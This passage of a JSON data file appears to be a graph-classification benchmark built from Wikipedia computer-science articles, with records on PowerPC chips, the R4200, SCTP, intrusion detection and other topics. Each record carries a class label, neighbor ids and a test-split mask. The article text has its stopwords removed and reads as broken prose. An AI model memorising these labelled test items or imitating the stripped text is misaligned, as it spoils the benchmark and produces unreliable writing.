operated speeds ranging 50 80 mhz fabricated using 0.6 µm cmos process four levels aluminum interconnect die 121 mm² large contained 2.8 million transistors 601 32 kb unified l1 cache capacity considered large time on-chip cache thanks partly large cache considered high performance processor segment outperforming competing intel pentium powerpc 601 used first power macintosh computers apple variety rs/6000 workstations smp servers ibm groupe bull ibm sole manufacturer 601 601+ microprocessors burlington vermont east fishkill new york production facilities 601 used ibm cmos-4s process 601+ used ibm cmos-5x process extremely small number 601 601+ processors relabeled motorola logos part numbers distributed motorola facts somewhat obscured given various pictures motorola mpc601 particularly one specific case masterful motorola marketing 601 named one time magazine 1994 products year motorola marking updated version powerpc 601v powerpc 601+ operating 90 120 mhz introduced 1994 fabricated newer 0.5 µm cmos process four levels interconnect resulting die measuring 74 mm² 601+ design remapped cmos-4s cmos-5x ibm-only team avoid time-to-market delays design tool changes commonizing fab groundrules 601 601+ designed ibm eda tools ibm systems fabricated ibm-only facilities powerpc 603 first processor implementing complete 32-bit powerpc architecture specified designed low cost low end processor portable embedded use one main features power saving functions doze nap sleep mode could dramatically reduce power requirements drawing 2 mw sleep mode 603 four-stage pipeline five execution units integer unit floating point unit branch prediction unit load/store unit system registry unit separate 8 kb l1 caches instructions data 32/64 bit 60x memory bus reaching 75 mhz 603 core hardware support smp powerpc 603 1.6 million transistors fabricated ibm motorola 0.5 µm cmos process four levels interconnect die 85 mm² large drawing 3 w 80 mhz 603 architecture direct ancestor powerpc 750 architecture marketed apple powerpc g3 603 intended used portable apple macintosh computers could run 68k emulation software performance apple considered adequate due smaller processor caches result apple chose use 603 low-cost desktop performa line caused delay apple powerbook 5300 powerbook duo 2300 apple chose wait processor revision apple use 603 performa 5200 line led processor getting poor reputation aside issue 68k emulation performance performa machines shipped variety design flaws severe related aspects computers design including networking performance stability bus problems width speed contention complexity rom bugs hard disk performance none problems 5200 line aside 68k emulation performance inherently due 603 rather processor retrofitted used 68k motherboards obsolete parts site low end mac rates performa 5200 worst mac all-time 603 found widespread use different embedded appliances performance issues 603 addressed powerpc 603e l1 cache enlarged enhanced 16 kb four-way set-associative data instruction caches clock speed processors doubled reaching 200 mhz shrinking fabrication process 0.35 µm allowed speeds 300 mhz part sometimes called powerpc 603ev 603e 603ev 2.6 million transistors 98 mm² 78 mm² large respectively 603ev draws maximum 6 w 300 mhz powerpc 603e first mainstream desktop processor reach 300 mhz used power macintosh 6500 603e also used accelerator cards phase5 amiga line computers cpus ranging speeds 160 240 mhz powerpc 603e still sold today ibm freescale others like atmel honeywell makes radiation hardened variant rhppc powerpc 603e also heart bebox inc bebox notable since multiprocessing system something 603 n't designed ibm also used powerpc 603e processors thinkpad 800 series laptop computers certain digital oscilloscope series lecroy used powerpc 603e main processor 603e processors also power 66 satellites iridium satellite phone fleet satellites contain seven motorola/freescale powerpc 603e processors running roughly 200 mhz custom 603e processor also used mark 54 lightweight torpedo powerpc 603e core renamed g2 freescale basis many embedded powerquicc ii processors keeps developed freescale powerquicc ii soc processors bear designation mpc82xx come variety configurations reaching 450 mhz freescale enhanced 603e core calling e300 powerquicc ii pro embedded processors larger 32/32 kb l1 caches performance enhancing measures added freescale powerquicc ii pro soc processors bear designation mpc83xx come variety configurations reaching speeds 667 mhz e300 also core mpc5200b soc processor used small efika computer powerpc 604 introduced december 1994 alongside 603 designed high-performance chip workstations entry-level servers support symmetric multiprocessing hardware 604 used extensively apple high-end systems also used macintosh clones ibm low-end rs/6000 servers workstations amiga accelerator boards embedded cpu telecom applications 604 superscalar processor capable issuing four instructions simultaneously 604 six-stage pipeline six execution units work parallel finishing six instructions every cycle two simple one complex integer units one floating point unit one branch processing unit managing out-of-order execution one load/store unit separate 16 kb data instruction l1 caches external interface 32- 64-bit 60x bus operates clock rates 50 mhz powerpc 604 contains 3.6 million transistors fabricated ibm motorola 0.5 µm cmos process four levels interconnect die measured 12.4 mm 15.8 mm 196 mm² drew 14-17 w 133 mhz operated speeds 100 180 mhz powerpc 604e introduced july 1996 added condition register unit separate 32 kb data instruction l1 caches among changes memory subsystem branch prediction unit resulting 25 performance increase compared predecessor 5.1 million transistors manufactured ibm motorola 0.35 µm cmos process five levels interconnect die 148 mm² 96 mm² large manufactured motorola ibm respectively drawing 16-18 w 233 mhz operated speeds 166 233 mhz supported memory bus 66 mhz powerpc 604ev 604r mach 5 introduced august 1997 essentially 604e fabricated ibm motorola newer process reaching higher speeds lower energy consumption die 47 mm² small manufactured 0.25 µm cmos process five levels interconnect drew 6 w 250 mhz operated speeds 250 400 mhz supported memory bus 100 mhz apple dropped 604ev 1998 favor powerpc 750 ibm kept using entry-level models rs/6000 computers several years powerpc 620 first implementation entire 64-bit powerpc architecture second generation powerpc alongside 603 604 geared towards high-end workstation server market powerful paper initially supposed launched alongside brethren delayed 1997 arrive performance comparably poor considerably cheaper 604e surpassed 620 therefore never produced large quantities found little use sole user powerpc 620 groupe bull escala unix machines n't deliver large numbers ibm intended use workstations servers decided wait even powerful rs64 power3 64-bit processors instead 620 produced motorola 0.5 µm process 6.9 million transistors die area 311 mm² operated clock rates 120 150 mhz drew 30 w 133 mhz later model built using 0.35 µm process enabling reach 200 mhz 620 similar 604 five-stage pipeline support symmetric multiprocessing number execution units load/store unit branch unit fpu three integer units larger 32 kb instruction data caches support l2 cache may capacity 128 mb powerful branch load/store units buffers 620 powerful branch history table also larger could dispatch instructions processor handle out-of-order execution efficiently 604 floating point unit also enhanced compared 604 faster fetch cycle support several key instruction hardware like sqrt made combined faster wider data buses efficient fpu 604 system bus wider faster 128-bit memory bus called 6xx bus designed system bus multiprocessor systems processors caches memory i/o connected assisted system control chip supports 32- 64-bit powerpc processors memory addresses larger 32 bits numa environments also used power3 rs64 601 well 604-based rs/6000 systems bridge chip bus later evolved gx bus power4 later gx+ gx++ power5 power6 respectively gx bus also used ibm z10 z196 system z mainframes powerpc 602 stripped version powerpc 603 specially made game consoles motorola ibm introduced february 1995 smaller l1 caches 4 kb instruction 4 kb data single-precision floating-point unit scaled back branch prediction unit offered speeds ranging 50 80 mhz drew 1.2 w 66 mhz consisted 1 million transistors 50 mm² large manufactured 0.5 µm cmos process four levels interconnect 3do developed m2 game console used two powerpc 602 never marketed october 21 1996 fabless semiconductor company quantum effect devices qed announced powerpc 603-compatible processor named powerpc 603q microprocessor forum despite name anything common 603 ground implementation 32-bit powerpc architecture targeted high-end embedded market developed two years small simple energy efficient powerful equaling expensive 603e drawing less power in-order five-stage pipeline single integer unit double precision floating point unit fpu separate 16 kb instruction 8 kb data caches integer unit brand new design fpu derived r4600 save time 69 mm² small using 0.5 µm fabrication process drew 1.2 w 120 mhz 603q designed motorola withdrew contract 603q went full production result 603q canceled qed could continue market processor since lacked powerpc license powerpc 613 seems name motorola given third generation powerpc supposedly renamed powerpc 750 response exponential technology x704 processor designed outgun 604 wide margin hardly sources confirming though might pure speculation reference completely different processor similar powerpc 613 powerpc 614 might name given motorola third generation powerpc later renamed reason 613 suggested part renamed powerpc 7400 motorola even bumped fourth generation powerpc even though architectural differences g3 g4 small hardly sources confirming though might pure speculation reference completely different processor powerpc 615 powerpc processor announced ibm 1994 never reached mass production main feature incorporate x86 core die thus making processor able natively process powerpc x86 instructions operating system running powerpc 615 could either chose execute 32-bit 64-bit powerpc instructions 32-bit x86 instructions mix three mixing instructions would involve context switch cpu small overhead operating systems supported 615 minix special development version os/2 330 mm² large manufactured ibm 0.35 µm process pin compatible intel pentium processors comparable speed processor introduced prototype program killed part fact microsoft never supported processor engineers working powerpc 615 would later find way transmeta worked crusoe processor powerpc 625 early name apache series 64-bit powerpc processors designed ibm based amazon powerpc-as instruction set later renamed rs64 designation powerpc 625 never used final processors powerpc 630 early name high end 64-bit powerpc processor designed ibm unify power powerpc instruction sets later renamed power3 probably distinguish consumer oriented powerpc processors used apple powerpc 641 codename habanero defunct powerpc project ibm 1994–96 timeframe suggested third generation powerpc based 604 processor",
    "neighbors": [
      6663,
      8711,
      5642,
      1548,
      2071,
      2073,
      1563,
      8231,
      11314,
      6715,
      9302,
      1635,
      7269,
      3185,
      4211,
      630,
      7286,
      7806,
      7299,
      1158,
      4743,
      7302,
      7305,
      8851,
      2708,
      6815,
      7842,
      6311,
      9391,
      5297,
      11447,
      1725,
      8893,
      10945,
      6878,
      8931,
      3304,
      10985,
      3319,
      3323,
      6914,
      3844,
      4868,
      3846,
      10501,
      6926,
      4881,
      10516,
      1309,
      6949,
      1321,
      10543,
      9020,
      336,
      8530,
      342,
      3932,
      11613,
      3936,
      869,
      8048,
      4465,
      8058,
      3467,
      1933,
      3472,
      7065,
      3493,
      8102,
      4017,
      1461,
      6072,
      8120,
      1983,
      1985,
      10180,
      3017,
      3540,
      10214,
      10734,
      10224,
      499,
      8700,
      8190,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 5236,
    "label": 2,
    "text": "Tom_Duff:tom duff thomas douglas selkirk duff born december 8 1952 computer programmer duff born toronto ontario canada named putative ancestor fifth earl selkirk grew toronto leaside 1974 graduated university waterloo b.math two years later got m.sc university toronto duff worked new york institute technology computer graphics lab mark williams company chicago moving lucasfilm computer research development division thomas porter another lucasfilm employee developed new approach compositing images 1984 paper compositing digital images seminal work algebra image compositing according keith packard porter-duff compositing key technique computer graphics see example xrender glitz duff later worked 12 years bell labs computing science research center worked computer graphics wireless networking plan 9 course work authored well known rc shell version 10 unix operating system duff worked pixar animation studios since 1996",
    "neighbors": [
      11442,
      11003,
      2045,
      9141
    ],
    "mask": "Test"
  },
  {
    "node_id": 5237,
    "label": 3,
    "text": "R4200:r4200 r4200 microprocessor designed mips technologies inc. mti implemented mips iii instruction set architecture isa also known vrx development microprocessor licensed nec company fabricated marketed vr4200 first vr4200 80 mhz part introduced 1993 faster 100 mhz part became available 1994 r4200 developed specifically low-power windows nt computers personal computers laptops mti claimed microprocessor integer performance greater high-end intel i486 80 p5-variant pentium microprocessor r4200 ultimately see use personal computers repositioned embedded microprocessor competed r4600 r4300i variant used widely popular nintendo 64 video game console r4200 scalar design five-stage classic risc pipeline notable feature use integer datapath performing arithmetic operations mantissa portion floating point number separate datapath used exponent scheme reduced cost reducing number transistors size chip power consumption also impacted floating point performance negatively r4200 intended applications require high floating point performance r4200 16 kb instruction cache 8 kb data cache caches direct-mapped instruction cache 32-byte line size whereas data cache 16-byte line size data cache uses write-back write protocol r4200 32-entry translation lookaside buffer tlb data 4-entry tlb instructions 33-bit physical address supported system bus 64 bits wide operates half internal clock frequency r4200 contained 1.3 million transistors area 81 mm nec fabricated r4200 600 nm cmos process three levels interconnect packaged 179-pin ceramic pin grid array compatible r4x00pc r4600 208-pin plastic quad flat pack pqfp used 3.3 v power supply dissipating 1.8 w typically maximum 2 w 80 mhz r4300i derivative r4200 designed mti embedded applications announced 17 april 1995 differs r4200 featuring improved integer multiplier lower latency cut-down 32-bit system bus reduced cost chip area 45 mm fabricated 350 nm process packaged 120-pin pqfp uses 3.3 v power supply dissipates 1.8 w 100 mhz 2.2 w 133 mhz r4300i licensed nec toshiba marketed companies vr4300 tx4300 respectively companies offered 100 133 mhz versions derivative vr4300 developed nec nintendo 64 game console clocked 93.75 mhz labeled nus-cpu although development boards nintendo 64 used stock nec vr4300 cpus final cpu found pin-compatible singular use mips implementation produced significant royalties mti sales nec made mips highest volume mixed 32/64-bit risc isa 1997 nec produced two derivatives r4300 general embedded market vr4305 vr4310 announced 20 january 1998 vr4310 available 100 133 167 mhz manufactured 250 nm process packaged 120-pin pqfp",
    "neighbors": [
      4098,
      7170,
      8327,
      8711,
      783,
      8976,
      659,
      7445,
      9851,
      4124,
      10784,
      8481,
      8355,
      5028,
      6949,
      4136,
      6057,
      938,
      426,
      7852,
      8237,
      7234,
      6981,
      1480,
      2635,
      10316,
      4569,
      6878,
      6247,
      7911,
      6250,
      6252,
      6253,
      5358,
      10734,
      6256,
      5617,
      4211,
      2805,
      3702,
      5237,
      760,
      3451
    ],
    "mask": "None"
  },
  {
    "node_id": 5238,
    "label": 7,
    "text": "Cascading_(software):cascading software cascading software abstraction layer apache hadoop apache flink cascading used create execute complex data processing workflows hadoop cluster using jvm-based language java jruby clojure etc hiding underlying complexity mapreduce jobs open source available apache license commercial support available driven inc. cascading originally authored chris wensel later founded concurrent inc re-branded driven cascading actively developed community number add-on modules available use cascading apache hadoop must also installed hadoop job .jar must contain cascading .jars cascading consists data processing api integration api process planner process scheduler cascading leverages scalability hadoop abstracts standard data processing operations away underlying map reduce tasks developers use cascading create .jar file describes required processes follows ‘ source-pipe-sink ’ paradigm data captured sources follows reusable ‘ pipes ’ perform data analysis processes results stored output files ‘ sinks ’ pipes created independent data process tied data sources sinks called ‘ flow ’ flows grouped ‘ cascade ’ process scheduler ensure given flow execute dependencies satisfied pipes flows reused reordered support different business needs developers write code jvm-based language need learn mapreduce resulting program regression tested integrated external applications like java application cascading often used ad targeting log file analysis bioinformatics machine learning predictive analytics web content mining extract transform load etl applications cascading cited one top five powerful hadoop projects sd times 2011 major open source project relevant bioinformatics included hadoop definitive guide tom white project also cited presentations conference proceedings hadoop user group meetings useful tool working hadoop apache spark",
    "neighbors": [
      6403,
      5031,
      8810,
      747,
      5677,
      11343,
      7248,
      9179,
      5567
    ],
    "mask": "Test"
  },
  {
    "node_id": 5239,
    "label": 2,
    "text": "MAD_(MUD):mad mud mad multi access dungeon global mud similar mud1 ran fremp11 bitnet node operated école nationale supérieure des mines de paris mud developed bruno chabrier vincent lextrait two students school began operating 1984 slightly less two years bitnet administrators concerned impact widespread adoption game asked école des mines stop mad installed several nodes world completely banned consequence success resulted complete saturation bitnet several occasions",
    "neighbors": [
      7144,
      7019
    ],
    "mask": "Test"
  },
  {
    "node_id": 5240,
    "label": 2,
    "text": "Solaris_Trusted_Extensions:solaris trusted extensions solaris trusted extensions set security extensions incorporated solaris 10 operating system sun microsystems featuring mandatory access control model succeeds trusted solaris family security-evaluated operating systems based earlier versions solaris solaris 10 5/09 common criteria certified evaluation assurance level eal4+ capp rbacpp lspp protection profiles certain trusted solaris features fine-grained privileges part standard solaris 10 release beginning solaris 10 11/06 solaris includes component called solaris trusted extensions gives additional features necessary position successor trusted solaris inclusion features mainstream solaris release marks significant change trusted solaris longer necessary use different solaris release modified kernel labeled security environments solaris trusted extensions opensolaris project trusted extensions additions enhancements include solaris trusted extensions enforce mandatory access control policy aspects operating system including device access file networking print window management services achieved adding sensitivity labels objects thereby establishing explicit relationships objects appropriate explicit authorization allows applications users read and/or write access objects component also provides labeled security features desktop environment apart extending support common desktop environment trusted solaris 8 release delivers first labeled environment based gnome solaris trusted extensions facilitate access data multiple classification levels single desktop environment solaris trusted extensions also delivers labeled device access labeled network communication cipso standard cipso used pass security information within labeled zones solaris trusted extensions complies federal information processing standard fips",
    "neighbors": [
      8077,
      2967,
      5280,
      6049,
      6445,
      7983,
      11184,
      1458,
      10170,
      9665,
      8904,
      10962,
      5335,
      11363,
      366,
      11506,
      4858,
      381,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 5241,
    "label": 5,
    "text": "SCTP_packet_structure:sctp packet structure stream control transmission protocol sctp simpler basic packet structure tcp consists two basic sections sctp packets require common header section shown blue background sctp packet consists addition common header chunks chunk common format contents vary green bytes diagram signify one chunk chunk length equate multiple 4 bytes protocol implicitly pads chunk trailing zeros additionally chunk type may define set parameters includes inside chunk value field consequently length chunk length two types parameter exist optional/variable-length parameters parameter type parameter length parameter value fields behave like chunk counterparts minimum size parameter 4 bytes occurs parameter value field empty parameter consists type length fields rfc 2960 defines following list chunk types detailed information type provided following subsections following table chunk parameters defined please note following color scheme init ack chunk replicates init chunk except chunk type always 2 defined yet defined yet two re-configuration parameters mentioned may appear chunk combinations valid see rfc 6525 details parameter used sender inform receiver wishes reset sequence numbers message-ids i-data used outgoing streams parameter used sender request receiver resets sequence numbers message-ids i-data used outgoing streams parameter used sender inform receiver wishes reset tsns ssns/mids streams parameter used response re-configuration request except possibly incoming ssn reset request elicits outgoing ssn reset request parameter granted parameter used sender request additional outgoing streams added association i.e incoming streams receiver parameter used sender request additional incoming streams added association i.e outgoing streams receiver pad chunk introduced facilitate path mtu discovery enabling sender arbitrarily increase size sctp packet i-data chunk introduced avoid large message one stream blocking messages streams transmitted sctp primarily uses tsn achieve reliability cases tsn also needed distinguish different data chunks message fragmented data tsn additionally doubles fragment sequence number means fragments message must sent using consecutive tsns effectively blocking data i-data chunk disentangles different uses tsn data chunks data i-data chunks compatible may used association forward-tsn chunk introduced support selective unreliability allows sender tell receiver retransmit number chunks requests receiver consider chunks received i-forward-tsn chunk introduced used instead forward-tsn i-data used instead data",
    "neighbors": [
      3742,
      10924,
      3006,
      5469,
      5470,
      7071
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5242,
    "label": 1,
    "text": "DatabaseSpy:databasespy databasespy multi-database query design database comparison tool altova creator xmlspy databasespy connects many major relational databases facilitating sql querying database structure design database content editing database comparison conversion databasespy database client application windows 7 8 10 windows xp windows server 2003 2008 allows database administrators database developers database-oriented professionals interact multiple relational databases may created different developers databasespy features include quick connection wizard multiple relational databases sql editor auto-completion graphical database design tool database content schema comparison data import export multiple formats databasespy also includes special support xml databases available 32-bit 64-bit versions databasespy connect multiple databases simultaneously including databases different types databasespy automatically adjusts variations sql dialects data type definitions supported relational databases databasespy connects following major database types initial release september 2006 users recognized benefits using single tool consistent user interface multiple databases perform routine tasks querying modifying tables use common graphical interface connect multiple databases possibly across different platforms cited valuable feature databasespy licensed software product uses key protection prevent unlicensed usage databasespy free try no-cost 30-day trial license",
    "neighbors": [
      7523,
      9286,
      5546,
      6797,
      7022,
      7983,
      9389,
      10413,
      11030,
      9177,
      8539,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 5243,
    "label": 2,
    "text": "Fast_user_switching:fast user switching fast user switching feature i.e term rather loosely specified functionality multi-user operating system allows users switch user accounts single computer without quitting applications logging linux kernel vt subsystem please consult articles pseudoterminal linux console virtual console dates back 1993 understand concept multiple seats meaning 63 vts one vt active given time despite kernel limitation multiseat supported gnu/linux feature fast user switching less severe necessities multi-seat multiple users n't work simultaneously therefore simply works straight forward solution elegant multi-seat kmscon/systemd-consoled combination systemd-logind available desktop environments gnome kde software compilation adapt graphical login session manager e.g gdm sddm lightdm etc underneath solution configured implement fast user switching way installations older environments functionality must enabled appropriate configuration files hot key sequence codice_1 pressed separate login window appear second user log even first user alternatively default install new x sessions started using different display parameters run different virtual terminals e.g codice_2 codice_3 hot key sequences allow user switching take place fast user switching may potentially introduce various security-related complications handled differently among operating systems advantages disadvantages one possibility simple secure first user gets ownership resources second option grant ownership resources new user last one log takes ownership third allow users access shared resources easier intuitive allows example one user record another user conversation windows shared resources sound available sessions red hat linux default behavior give ownership console resources first connected session share resources among groups console users configured manage console ownership differently fast user switching windows based remote desktop services technology windows xp gina component winlogon fast user switching interacts programmatically called automate fast user switch powertoy known super fast user switcher offered 2002 microsoft allowed fast user switching using keyboard hotkey win+q similar alt-tab without even going welcome screen later made unavailable original set powertoys replaced updated versions still works windows xp sp3 32-bit running administrator windows vista gina replaced credential providers however support programmatic initiation fast user switching windows xp fast user switching unavailable computer windows server domain network offline files enabled windows vista later longer restrictions",
    "neighbors": [
      11075,
      6213,
      7207,
      1577,
      6697,
      9353,
      7983,
      8080,
      11135,
      9173,
      3351,
      11257,
      9438,
      2399
    ],
    "mask": "None"
  },
  {
    "node_id": 5244,
    "label": 3,
    "text": "Mm_tree:mm tree among linux kernel developers -mm tree refers version kernel source code maintained andrew morton -mm kernel tree used fill role linux kernel development builds formerly identified odd version numbers following 2.6 see section linux kernel version numbering new experimental code used find way 2.6.x-mm kernel build historically -mm tree focused new developments memory management part kernel mm occasionally -mm tree overloaded new patches testing became overly difficult sep 17 2007 andrew morton sent mail saying n't working presence new linux-next git repository offloaded much work made mm maintenance difficult allowing andrew morton continue use quilt manage series mmotm mm moment patches andrew morton includes subset mmotm patches linux-next head called linux-next/akpm also git tree includes patches appear releases mm tree get mm patches given time developers still need quilt ad hoc shell scripts apply full set patches",
    "neighbors": [
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      6213,
      8268,
      5222,
      10856,
      4734,
      7812,
      4238,
      10382,
      2195,
      2711,
      9882,
      1694,
      2723,
      10933,
      5815,
      5822,
      1736,
      2762,
      8909,
      8410,
      10971,
      8928,
      1761,
      2278,
      233,
      10482,
      2294,
      8439,
      2809,
      4360,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      9621,
      8602,
      7070,
      11678,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 5245,
    "label": 4,
    "text": "Intrusion_detection_system:intrusion detection system intrusion detection system ids device software application monitors network systems malicious activity policy violations malicious activity violation typically reported either administrator collected centrally using security information event management siem system siem system combines outputs multiple sources uses alarm filtering techniques distinguish malicious activity false alarms ids types range scope single computers large networks common classifications network intrusion detection systems nids host-based intrusion detection systems hids system monitors important operating system files example hids system analyzes incoming network traffic example nids also possible classify ids detection approach well-known variants signature-based detection recognizing bad patterns malware anomaly-based detection detecting deviations model good traffic often relies machine learning another reputation-based detection recognizing potential threat according reputation scores ids products ability respond detected intrusions systems response capabilities typically referred intrusion prevention system intrusion detection systems also serve specific purposes augmenting custom tools using honeypot attract characterize malicious traffic although relate network security ids differs firewall firewall looks outwardly intrusions order stop happening firewalls limit access networks prevent intrusion signal attack inside network ids describes suspected intrusion taken place signals alarm ids also watches attacks originate within system traditionally achieved examining network communications identifying heuristics patterns often known signatures common computer attacks taking action alert operators system terminates connections called intrusion prevention system performs access control like application layer firewall ids classified detection takes place network host detection method employed signature anomaly-based network intrusion detection systems nids placed strategic point points within network monitor traffic devices network performs analysis passing traffic entire subnet matches traffic passed subnets library known attacks attack identified abnormal behavior sensed alert sent administrator example nids would installing subnet firewalls located order see someone trying break firewall ideally one would scan inbound outbound traffic however might create bottleneck would impair overall speed network opnet netsim commonly used tools simulating network intrusion detection systems nid systems also capable comparing signatures similar packets link drop harmful detected packets signature matching records nids classify design nids according system interactivity property two types on-line off-line nids often referred inline tap mode respectively on-line nids deals network real time analyses ethernet packets applies rules decide attack off-line nids deals stored data passes processes decide attack nids also combined technologies increase detection prediction rates artificial neural network based ids capable analyzing huge volumes data smart way due self-organizing structure allows ins ids efficiently recognize intrusion patterns neural networks assist ids predicting attacks learning mistakes inn ids help develop early warning system based two layers first layer accepts single values second layer takes first layers output input cycle repeats allows system automatically recognize new unforeseen patterns network system average 99.9 detection classification rate based research results 24 network attacks divided four categories dos probe remote-to-local user-to-root host intrusion detection systems hids run individual hosts devices network hids monitors inbound outbound packets device alert user administrator suspicious activity detected takes snapshot existing system files matches previous snapshot critical system files modified deleted alert sent administrator investigate example hids usage seen mission critical machines expected change configurations signature-based ids refers detection attacks looking specific patterns byte sequences network traffic known malicious instruction sequences used malware terminology originates anti-virus software refers detected patterns signatures although signature-based ids easily detect known attacks difficult detect new attacks pattern available signature-based ids signatures released vendor products on-time updating ids signature key aspect anomaly-based intrusion detection systems primarily introduced detect unknown attacks part due rapid development malware basic approach use machine learning create model trustworthy activity compare new behavior model since models trained according applications hardware configurations machine learning based method better generalized property comparison traditional signature-based ids although approach enables detection previously unknown attacks may suffer false positives previously unknown legitimate activity may also classified malicious existing idss suffer time-consuming detection process degrades performance idss efficient feature selection algorithm makes classification process used detection reliable new types could called anomaly-based intrusion detection systems viewed gartner user entity behavior analytics ueba evolution user behavior analytics category network traffic analysis nta particular nta deals malicious insiders well targeted external attacks compromised user machine account gartner noted organizations opted nta traditional ids systems may attempt stop intrusion attempt neither required expected monitoring system intrusion detection prevention systems idps primarily focused identifying possible incidents logging information reporting attempts addition organizations use idps purposes identifying problems security policies documenting existing threats deterring individuals violating security policies idps become necessary addition security infrastructure nearly every organization idps typically record information related observed events notify security administrators important observed events produce reports many idps also respond detected threat attempting prevent succeeding use several response techniques involve idps stopping attack changing security environment e.g reconfiguring firewall changing attack content intrusion prevention systems ips also known intrusion detection prevention systems idps network security appliances monitor network system activities malicious activity main functions intrusion prevention systems identify malicious activity log information activity report attempt block stop it.. intrusion prevention systems considered extensions intrusion detection systems monitor network traffic and/or system activities malicious activity main differences unlike intrusion detection systems intrusion prevention systems placed in-line able actively prevent block intrusions detected ips take actions sending alarm dropping detected malicious packets resetting connection blocking traffic offending ip address ips also correct errors defragment packet streams mitigate tcp sequencing issues clean unwanted transport network layer options.. intrusion prevention systems classified four different types majority intrusion prevention systems utilize one three detection methods signature-based statistical anomaly-based stateful protocol analysis number techniques attackers using following considered 'simple measures taken evade ids earliest preliminary ids concept delineated 1980 james anderson national security agency consisted set tools intended help administrators review audit trails user access logs file access logs system event logs examples audit trails fred cohen noted 1987 impossible detect intrusion every case resources needed detect intrusions grow amount usage dorothy e. denning assisted peter g. neumann published model ids 1986 formed basis many systems today model used statistics anomaly detection resulted early ids sri international named intrusion detection expert system ides ran sun workstations could consider user network level data ides dual approach rule-based expert system detect known types intrusions plus statistical anomaly detection component based profiles users host systems target systems author ides intelligent system detecting intruders teresa f. lunt proposed adding artificial neural network third component said three components could report resolver sri followed ides 1993 next-generation intrusion detection expert system nides multics intrusion detection alerting system midas expert system using p-best lisp developed 1988 based work denning neumann haystack also developed year using statistics reduce audit trails 1986 national security agency started ids research transfer program rebecca bace bace later published seminal text subject intrusion detection 2000 wisdom sense w statistics-based anomaly detector developed 1989 los alamos national laboratory w created rules based statistical analysis used rules anomaly detection 1990 time-based inductive machine tim anomaly detection using inductive learning sequential user patterns common lisp vax 3500 computer network security monitor nsm performed masking access matrices anomaly detection sun-3/50 workstation information security officer assistant isoa 1990 prototype considered variety strategies including statistics profile checker expert system computerwatch bell labs used statistics rules audit data reduction intrusion detection 1991 researchers university california davis created prototype distributed intrusion detection system dids also expert system network anomaly detection intrusion reporter nadir also 1991 prototype ids developed los alamos national laboratory integrated computing network icn heavily influenced work denning lunt nadir used statistics-based anomaly detector expert system lawrence berkeley national laboratory announced bro 1998 used rule language packet analysis libpcap data network flight recorder nfr 1999 also used libpcap ape developed packet sniffer also using libpcap november 1998 renamed snort one month later snort since become world largest used ids/ips system 300,000 active users monitor local systems remote capture points using tzsp protocol audit data analysis mining adam ids 2001 used tcpdump build profiles rules classifications 2003 yongguang zhang wenke lee argue importance ids networks mobile nodes 2015 viegas colleagues proposed anomaly-based intrusion detection engine aiming system-on-chip soc applications internet things iot instance proposal applies machine learning anomaly detection providing energy-efficiency decision tree naive-bayes k-nearest neighbors classifiers implementation atom cpu hardware-friendly implementation fpga literature first work implement classifier equivalently software hardware measures energy consumption additionally first time measured energy consumption extracting features used make network packet classification implemented software hardware",
    "neighbors": [
      3072,
      2049,
      5636,
      10245,
      10756,
      9227,
      2062,
      9233,
      5139,
      7192,
      3609,
      5657,
      9242,
      9761,
      2084,
      550,
      9256,
      9771,
      3629,
      8753,
      3125,
      5176,
      10297,
      3643,
      7739,
      62,
      9791,
      1088,
      11330,
      4163,
      4165,
      2118,
      5195,
      4689,
      612,
      1640,
      107,
      3698,
      6772,
      6773,
      5246,
      9345,
      3714,
      6786,
      5764,
      3717,
      7813,
      11400,
      8329,
      9356,
      2192,
      4245,
      10392,
      1690,
      10908,
      10909,
      5281,
      7843,
      2213,
      7851,
      687,
      1200,
      7855,
      9393,
      10417,
      186,
      3262,
      10433,
      2754,
      8387,
      9926,
      7368,
      6345,
      6347,
      9932,
      5325,
      5327,
      7887,
      8399,
      2262,
      6360,
      4314,
      731,
      8922,
      6373,
      5874,
      2292,
      2294,
      4344,
      3320,
      5880,
      9465,
      10492,
      5373,
      1279,
      4863,
      2305,
      9473,
      6406,
      9488,
      7441,
      8978,
      4883,
      278,
      1304,
      3867,
      4892,
      5404,
      5407,
      3872,
      8998,
      11561,
      10539,
      300,
      3885,
      3887,
      7983,
      10546,
      9524,
      5433,
      3395,
      836,
      10055,
      6992,
      4435,
      11604,
      2901,
      7515,
      4956,
      11611,
      1890,
      3941,
      6502,
      11621,
      2409,
      3433,
      877,
      7537,
      4471,
      7031,
      9591,
      2426,
      2430,
      10110,
      899,
      7044,
      8580,
      9607,
      9102,
      3473,
      1429,
      10141,
      3486,
      2975,
      2985,
      939,
      9646,
      7089,
      1970,
      11188,
      4023,
      9145,
      8122,
      6588,
      11198,
      9665,
      1474,
      3525,
      1480,
      3529,
      9160,
      2508,
      8141,
      4049,
      7124,
      5589,
      3032,
      9688,
      8155,
      9187,
      2539,
      11244,
      1006,
      9710,
      9714,
      10232,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5246,
    "label": 4,
    "text": "Mobile_secure_gateway:mobile secure gateway mobile secure gateway msg industry term software hardware appliance provides secure communication mobile application respective backend resources typically within corporate network addresses challenges field mobile security msg typically composed two components client library gateway client library linked mobile application establishes secure connectivity gateway using cryptographic protocol typically ssl/tls represents secured channel used communication mobile application hosts gateway separates internal infrastructure internet allowing authorized client requests reach specific set hosts inside restricted network client library linked corresponding mobile application provides secure access via gateway set hosts client library exposes public api mobile application mimicking platform default http client library application uses api communicate desired hosts secure way gateway server daemon typically installed onto physical virtual appliance placed dmz gateway public interface exposed internet untrusted network accepts tcp/ip connections mobile applications operates ipv4 and/or ipv6 networks incoming client connections typically use ssl/tls provide security network communication mutual trust communicating peers communication protocol typically based http gateway forwards requests connected apps collection configured hosts typically http https servers services within internal network response host sent back respective mobile app",
    "neighbors": [
      899,
      5636,
      10756,
      9607,
      9356,
      9488,
      3473,
      8978,
      10392,
      5373,
      5531,
      4892,
      5404,
      2975,
      2084,
      2213,
      8998,
      939,
